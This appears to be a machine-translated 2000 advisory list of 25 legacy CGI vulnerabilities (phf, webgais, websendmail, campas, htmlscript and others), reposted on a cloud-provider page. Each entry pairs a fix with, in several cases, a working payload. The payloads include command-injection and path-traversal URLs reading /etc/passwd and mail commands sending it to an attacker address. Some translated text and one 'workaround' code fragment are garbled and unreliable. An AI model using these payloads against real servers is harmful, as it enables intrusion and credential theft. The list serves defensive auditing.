CGI security vulnerability Data Quick Check v1.0 (Turn one)

Source: Internet
Author: User
Tags count log mail sql net split access linux
cgi| Security | Security vulnerabilities CGI security vulnerability data Quick Check v1.0

Date: 2000-8-15

#############################################################################
This article is taken from a friend. This is not a precious thing, if you usually pay attention to collect words, I believe many people will
There is more comprehensive and better information than this. But for some reason, this information has been refused to be made public. But I'm a cult-end
Full free, fully open, fully shared little guys. So I made the information public. I hope that friend don't blame:)
# If any security organization or individual is willing to have no taste of this article for long-term, uninterrupted maintenance, updates or changes. Please do your own
Don't bother to discuss it with me. But the requirement is that results must be completely public to the Internet. The possession of any act is not to be merry.
Welcome to.
# This article welcomes the transfer. But please keep these statements.
# If you have any questions or suggestions, please mailto:iwillsurewin@163.net
# Iwillsurewin 2000.7.28
############################################################################

         
1
Type: Attack type
Name: PHF
Risk Rating: Medium
Description: In NCSA or Apache (1.1.1 version), a non-commercial version of the Web server has a program util.c that allows hackers to execute any command as root:
Http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
Suggestions:
Workaround: Upgrade the Apache Web server to 1.1.1 or upgrade the NCSA Web server to the latest version

_________________________________________________________________

2
Type: Attack type
Name: Wguset.exe
Risk Rating: Medium
Description: If you use NT as your webserver operating system, and Wguest.exe exists in your Web executable directory, intruders will be able to use it to read files that all usr_Recommendation: Remove or remove Wguset.exe from your web directory
Workaround: Remove or remove Wguset.exe from your web directory

___________________________________________________________________


3
Type: Attack type
Name: Rguset.exe
Risk Rating: Medium
Description: If you use NT as your webserver operating system, and Rguest.exe exists in your Web executable directory, intruders will be able to use it to read files that all usr_Recommendation: Remove or remove Rguset.exe from your web directory
Workaround: Remove or remove Rguset.exe from your web directory


_______________________________________________________________________

4
Type: Attack type
Name: Perl.exe
Risk Rating: Low
Description: There is a perl.exe in the Cgi-bin execution directory, which is a serious configuration error. Hackers can add a bunch of instructions behind the Perl.exe and use the browser to execute any script on the server
Recommendation: Perl.exe is not safe in any Web directory with Execute permissions
Workaround: Remove the Perl.exe this program under the Web directory.


____________________________________________________________________


5
Type: Attack type
Name: Shtml.exe
Risk Rating: Low
Description: If you use front page as your webserver, then intruders can use iusr_<lt;hostname> users and shtml.exe to invade your machine and do what you don't want
Recommendation: Remove or remove Shtml.exe from your web directory
Workaround: Remove or remove Shtml.exe from your web directory


___________________________________________________________________


6
Type: Attack type
Name: wwwboard.pl
Risk Rating: Low
Description: wwwboard.pl program can easily cause an attacker to D.O.S attacks on the server
Recommendation: You can delete the file if it is not necessary
Workaround: For the following paragraph in the Get_variables subroutine:
if ($FORM {' followup '}) {$followup = ' 1 ';
@followup_num = Split (/,/, $FORM {' followup '});
$num _followups = @followups = @followup_num;
$last _message = Pop (@followups);
$origdate = "$FORM {' origdate '}";
$origname = "$FORM {' OrigName '}";
$origsubject = "$FORM {' Origsubject '}"; }
To be replaced by:
if ($FORM {' followup '}) {
$followup = "1";
@followup_num = Split (/,/, $FORM {' followup '});
$num _followups = @followups = @followup_num;
$last _message = Pop (@followups);
$origdate = "$FORM {' origdate '}";
$origname = "$FORM {' OrigName '}";
$origsubject = "$FORM {' Origsubject '}";
# Wwwboard Bomb Patch
# written By:samuel sparling sparling@slip.net)
$FN = 0;
while ($fn < $num _followups)
{
$cur _fup = @followups $FN];
$DFN = 0;
foreach $fm (@followups)
{
if (@followups [$DFN] = = @followups [$FN] && $dfn!= $fn)
{
&error (Board_bomb);
}
$DFN + +;
}
$FN + +;
}
# End Wwwboard Bomb Patch
}

Related connection: HTTP://HGFR

_________________________________________________________________________

7
Type: Attack type
Name: Uploader.exe
Risk Rating: Medium
Description: If you use NT as your webserver operating system, intruders can upload any file using Uploader.exe
Recommendation: Remove or remove Uploader.exe from your web directory
Workaround: Remove or remove Uploader.exe from your web directory

________________________________________________________________

8
Type: Attack type
Name: BDIR.HTR
Risk Rating: High
Description: If you use NT as your webserver operating system, and BDIR.HTR exists in your Web executable directory, intruders will be able to use it to create an ODBC database indefinitely on your server and generate some executable files.
Recommendation: Remove or remove BDIR.HTR from your web directory
Workaround: Remove or remove BDIR.HTR from your web directory

__________________________________________________________________

9
Type: Attack type
Name: count.cgi
Risk Rating: High
Description: The COUNT.CGI program (wwwcount2.3 version) in the/cgi-bin directory has an overflow error that allows intruders to execute any instructions remotely without logging on.
Recommendation: You can delete the file if it is not necessary
Workaround: Upgrade the Wwwcount to 2.4 or more

_________________________________________________________________

10
Type: Attack type
Name: test-cgi
Risk Rating: High
Description: test-cgi This file can be used by intruders to browse important information on the server

Recommendation: Recommend audit Cgi-bin Directory of the implementation procedures, strict control of access rights
Workaround: Delete the test-cgi file

__________________________________________________________________

11
Type: Attack type
Name: nph-test-cgi
Risk Rating: High
Description: nph-test-cgi This file can be used by intruders to browse important information on the server

Recommendation: Recommend audit Cgi-bin Directory of the implementation procedures, strict control of access rights
Workaround: Delete the nph-test-cgi file

__________________________________________________________________

12
Type: Attack type
Name: php.cgi
Risk Rating: Low
Description: php.cgi programs have more vulnerabilities, including cache overflow vulnerabilities, and vulnerabilities that cause any system files to be read by intruders
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Removing the PHP.CGI program is the best way

_________________________________________________________________

13
Type: Attack type
Name: Handler
Risk Rating: Low
Description: IRIX 5.3, 6.2, 6.3, 6.4 The/cgi-bin/handler program has a cache overflow error that allows an intruder to execute a program remotely on the server:
Telnet target.machine.com 80
Get/cgi-bin/handler/whatever;cat/etc/passwd|? data=download
http/1.0
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
WORKAROUND: Delete the handler file

________________________________________________________________


14
Type: Attack type
Name: Webgais
Risk Rating: High
Description:/cgi-bin, the Webgais in the directory is an interface to the Gais search tool, which has a problem that allows intruders to bypass the security mechanism of the program and execute system commands:
Post/cgi-bin/webgais http/1.0
CONTENT-LENGTH:85 (replace this and the actual length of the "Exploit" line)
Telnet target.machine.com 80

Query= '; mail+you\ @your. Host</etc/passwd;echo ' &output=subject&domain=paragraph
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Webgais file

________________________________________________________________

15
Type: Attack type
Name: Websendmail
Risk Rating: High
Description: The Websendmail program in the/cgin-bin directory allows intruders to execute a system directive:

Telnet target.machine.com 80
Post/cgi-bin/websendmail http/1.0
Content-length:xxx (should is replaced with the actual length of the string passed to the "server, in this case xxx=90)
Receiver=;mail+your_address\ @somewhere. Org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Advanced User: Edit Websendmail script, filter special characters
General User: Delete websendmail file

____________________________________________________________________

16
Type: Attack type
Name: webdist.cgi
Risk Rating: High
Description: For Irix6.2 and 6.3 platforms, the webdist.cgi in the/cgi-bin directory has a weakness that allows intruders to execute any instructions on the system without having to log on:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the webdist.cgi in the/var/www/cgi-bin/webdist.cgi directory

__________________________________________________________________

17
Type: Attack type
Name: Faxsurvey
Risk Rating: High
Description: The Faxsurvey program on the Linux S.U.S.E/cgi-bin directory allows intruders to execute instructions on the server without having to log on:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the/cgi-bin/faxsurvey file


_______________________________________________________________________


18
Type: Attack type
Name: Htmlscript
Risk Rating: Medium
Description: A htmlscript2.99x or earlier server is installed, and there is a problem that allows intruders to view any file on the server:
Http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the/cgi-bin/htmlscript script file, or upgrade the Htmlscript to 3. More than 0


__________________________________________________________________________

19
Type: Attack type
Name: Pfdisplay
Risk Rating: Medium
Description: On Irix6.4 or earlier Web servers,/cgi-bin/pfdisplay programs allow intruders to illegally view files on the server
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete/cgi-bin/pfdisplay files, or patch
Patches can be downloaded to sgigate.sgi.com (204.94.209.1) or ftp.sgi.com:
filename:readme.patch.3018
Algorithm #1 (sum-r): 37955 readme.patch.3018
Algorithm #2 (sum): 15455 readme.patch.3018
MD5 checksum:1169eb51d75e0794c64c2c1fd6211b69

filename:patchsg0003018
Algorithm #1 (sum-r): 01679 2 patchSG0003018
Algorithm #2 (SUM): 12876 2 patchSG0003018
MD5 Checksum:bd16a53a0ae693d6e9e276ee066bdbc8

Filename:patchSG0003018.idb
Algorithm #1 (sum-r): 01339 2 Patchsg0003018.idb
Algorithm #2 (SUM): 251 2 Patchsg0003018.idb
MD5 Checksum:1cb16e6a8c50bf17cd02a29c2e4d35eb

Filename:patchSG0003018.performer_tools_man
Algorithm #1 (sum-r): 10201 8 Patchsg0003018.performer_tools_man
Algorithm #2 (SUM): 3144 8 Patchsg0003018.performer_tools_man
MD5 checksum:b6b3d90fab9b5a342397c3e5af5a8d29

Filename:patchSG0003018.performer_tools_sw
Algorithm #1 (sum-r): 48474 patchsg0003018.performer_tools_sw
Algorithm #2 (sum): 28176 PATCHSG0003018.PERFORMER_TOOLS_SW
MD5 checksum:df4e8ed8326a6a0b39f7b4d67e5fd71f
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
Type: Attack type
Name: Www-sql
Risk Rating: Medium
Description: Www-sql exists in the/cgi-bin/directory, which will cause intrusion to be unauthorized access to protected files
Recommendation: It is best to delete www-sql files
Workaround: #if phpfastcgi
while (fcgi_accept () >= 0)
{
#endif
s = getenv ("Redirect_status");
if (!s) {
Puts ("Content-type:text/plain\r\n\r\nphp/fi detected an internal error. Please inform sa@hogia.net of what for you just did.\n ");
Exit (1);
}
s = getenv ("path_translated");
Related connections:

_________________________________________________________________________________


21st
Type: Attack type
Name: View-source
Risk Rating: High
Description: The View-source program in the Cgi-bin directory does not have security checks on the input, allowing intruders to view any files on the server
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Viewsource program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

______________________________________________________________________

22
Type: Attack type
Name: Campas
Risk Rating: High
Description: The Campas program in the Cgi-bin directory has a problem that allows intruders to view important files on the server at random:
Telnet Www.xxxx.net 80
Trying 200.xx.xx.xx ...
Connected to Venus.xxxx.net
Escape character is ' ^] '.
get/cgi-bin/campas?%0 acat%0a/etc/passwd%0a
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Campas program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


___________________________________________________________________________


23
Type: Attack type
Name: Aglimpse
Risk Rating: High
Description: The Aglimpse program in the Cgi-bin directory has a problem that allows intruders to execute arbitrary instructions without having to log on
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Aglimpse program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


______________________________________________________________________________

24
Type: Attack type
Name: at-admin.cgi
Risk Rating: Medium
Description: The/CGI-BIN/AT-ADMIN.CGI program on excite for WEB Servers 1.1 allows ordinary users to fully control the entire system
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the at-admin.cgi program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________

25
Type: Attack type
Name: Finger
Risk Rating: Medium
Description: This finger program, located under/cgi-bin, can view information about other servers, but if you change the parameters to a machine, the account information on this machine will be exposed:
/cgi-bin/finger? @localhost
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
WORKAROUND: Delete the finger program in the/cgi-bin directory
Related connections:


________________________________________________________________________


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.